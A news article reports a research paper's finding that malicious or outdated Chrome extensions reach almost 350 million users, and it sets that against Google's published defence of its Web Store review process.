Google underplaying risk of compromised extensions to Chrome

Compromised extensions affect almost 350 million users globally

Google underplaying risk of compromised extensions to Chrome

Half the extensions known to feature vulnerabilities in Google Chrome are still available in the Web Store two years after disclosure, claim researchers

Compromised extensions for the Chrome web browser affect almost 350 million users worldwide, despite Google's claims that insecure or malicious code affects under one per cent of all extensions in the Chrome Web Store.

The claims were made in a recently published research paper by security specialists at Cornell University, researchers Sheryl Hsu, Manda Tran and Aurore Fass.

"Security-noteworthy extensions are a significant issue: they have pervaded the Chrome Web Store for years and affect almost 350 million users," they wrote. Moreover, there are clusters of extensions sharing a similar code base, often cut and pasted from public repositories and forums, including code from vulnerable JavaScript libraries. These issues indicate that Google's Chrome security reviews might be flawed.

Security-noteworthy extensions encompass both out-and-out malicious extensions, as well as extensions running dated code that could include vulnerabilities. Indeed, 60 per cent of the extensions in the Chrome Web Store have never been updated, and half the extensions known to feature vulnerabilities are still there two years after disclosure.

Browser extensions are a particular security concern for both individuals and corporates as they can access sensitive information, propagate malware, keep tabs on users, and even to steal data.

In response to security concerns, Google developed the Manifest v3 initiative, an API specification intended to limit the potential for extensions to perpetrate such abuses. For example, one of the security enhancements of Manifest v3 was blocking extensions from downloading and running external code – all code must be packaged within the extension.

But critics claim that it was as much about preventing users from blocking adverts as it was about security, while the researchers note that extensions based on Manifest v2 still account for the majority of Chrome extensions.

Nevertheless, in a Google Security blog, published in response, Chrome Security Team members Benjamin Ackerman, Anunoy Ghosh, and David Warren were keen to defend the company and its technology.

"Before an extension is even accessible to install from the Chrome Web Store, we have two levels of verification to ensure an extension is safe," they wrote.

These include, first, an automated review to identify potentially suspicious code in an extension. This is followed by a review by a team member, which also includes an examination of the images, descriptions, and public policies of each extension.

"Depending on the results of both the automated and manual review, we may perform an even deeper and more thorough review of the code.

"This review process weeds out the overwhelming majority of bad extensions before they even get published. In 2024, less than one per cent of all installs from the Chrome Web Store were found to include malware. We're proud of this record and yet some bad extensions still get through, which is why we also monitor published extensions."

They added that updates are also monitored – but, it appears, in a much less thorough manner – by "periodically reviewing what extensions are actually doing and comparing that to the stated objectives defined by each extension in the Chrome Web Store".